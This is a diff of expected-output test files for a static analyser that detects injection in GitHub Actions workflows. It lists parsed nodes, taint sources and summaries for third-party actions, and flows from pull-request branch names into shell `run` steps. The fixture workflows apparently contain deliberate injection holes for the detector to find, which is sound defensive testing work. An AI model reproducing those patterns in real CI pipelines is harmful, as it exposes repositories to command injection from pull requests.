.ref }} | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +varAccesses +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | +orphanVarAccesses +nonOrphanVarAccesses +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | needs.job1.outputs.job_output | .github/workflows/test.yml:39:9:40:53 | id: sink | +parentNodes +| .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | uses: a ... 
kout@v4 | +| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | +| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | +cfgNodes +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +dfNodes +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +exprNodes +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +argumentNodes +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +usesIds +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | step | +nodeLocations +| .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | +| .github/workflows/test.yml:11:9:15:6 | uses: a ... 
kout@v4 | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | +| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +scopes +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | +| ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | +| dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | +| jitterbit/get-changed-files | * | output.added | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.added_modified | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.all | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.deleted | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.modified | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.removed | pull_request_target | PR changed files | +| jitterbit/get-changed-files | * | output.renamed | pull_request_target | PR changed files | +| khan/pull-request-comment-trigger | * | output.comment_body | issue_comment | | +| khan/pull-request-comment-trigger | * | output.comment_body | pull_request_comment | | +| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | * | Foo | +| tj-actions/branch-names | * | output.current_branch | pull_request_target | PR current branch | +| tj-actions/branch-names | * | output.head_ref_branch | pull_request_target | PR head branch | +| tj-actions/branch-names | * | output.ref_branch | pull_request_target | Branch tirggering workflow run | +| tj-actions/changed-files | * | output.added_files | pull_request_target | PR changed files | +| 
tj-actions/changed-files | * | output.all_changed_and_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.changed_keys | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.copied_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.deleted_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.modified_keys | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_deleted_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.other_modified_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.renamed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.type_changed_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.unknown_files | pull_request_target | PR changed files | +| tj-actions/changed-files | * | output.unmerged_files | pull_request_target | PR changed files | +| tj-actions/verify-changed-files | * | output.changed-files | pull_request_target | PR changed files | +| tzkhan/pr-update-action | * | output.headMatch | pull_request_target | | +| xt0rted/slash-command-action | * | output.command-arguments | issue_comment | | +| xt0rted/slash-command-action | * | output.command-arguments | pull_request_comment | | +summaries +| 
akhileshns/heroku-deploy | * | input.branch | output.status | taint | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | +| bobheadxi/deployments | * | input.env | output.env | taint | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | +| csexton/release-asset-action | * | input.release-url | output.url | 
taint | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | +| frabert/replace-string-action | * | input.string | output.replaced | taint | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | +| getsentry/action-release | * | input.version | output.version | taint | +| getsentry/action-release | * | input.version_prefix | output.version | taint | +| github/codeql-action | * | input.output | output.sarif-output | taint | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | +| haya14busa/action-cond | * | input.if_false | output.value | taint | +| haya14busa/action-cond | * | input.if_true | output.value | taint | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | +| jsdaniell/create-json | * | input.json | output.successfully | taint | +| jsdaniell/create-json | * | input.name | output.successfully | taint | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | +| mishakav/pytest-coverage-comment | * | input.multiple-files | 
output.summaryReport | taint | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | +| octo-org/summary-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | +| octo-org/this-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | +calls +| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | diff --git a/ql/src/test/partial.expected b/ql/src/test/partial.expected new file mode 100644 index 000000000000..98aea83de2e5 --- /dev/null +++ b/ql/src/test/partial.expected 
@@ -0,0 +1,28 @@ +edges +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... 
utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +#select +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... 
.yml@v1 | this source | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... 
